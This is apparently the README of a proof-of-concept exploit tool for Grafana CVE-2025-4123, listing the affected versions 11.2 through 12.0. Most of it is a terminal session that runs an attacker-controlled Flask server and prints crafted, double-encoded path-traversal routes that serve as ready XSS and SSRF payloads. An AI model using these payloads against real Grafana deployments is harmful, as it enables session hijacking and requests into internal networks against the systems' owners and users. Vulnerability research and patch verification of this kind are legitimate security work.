# Grafana CVE-2025-4123 Exploit

> **CVE ID:** [CVE-2025-4123](https://grafana.com/blog/2025/05/21/grafana-security-release-high-severity-security-fix-for-cve-2025-4123/)
> 
> **Severity:** High
> 
> **Impact:** Server-Side Request Forgery (SSRF), Cross-Site Scripting
> 
> **Affected Versions:** Grafana 11.2, Grafana 11.3, Grafana 11.4, Grafana 11.5, Grafana 11.6, Grafana 12.0
> 
> **Full Writeup** [Writeup](https://nightbloodz.github.io/grafana-CVE-2025-4123/)
> 

```bash
❯ sudo python server.py --host http://127.0.0.1

[+] Using attacker host: http://127.0.0.1

[+] XSS Route: /a/..%2f..%2f..%2fpublic%2f..%252f%255C127.0.0.1%252f%253Fp%252f..%252f..%23/explore
[+] SSRF Route: /render/public/..%252f%5Chttp://127.0.0.1%252f%3F%252f..%252f..

 * Serving Flask app 'server'
 * Debug mode: on
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on all addresses (0.0.0.0)
 * Running on http://127.0.0.1:80
 * Running on http://192.168.100.2:80
Press CTRL+C to quit
```
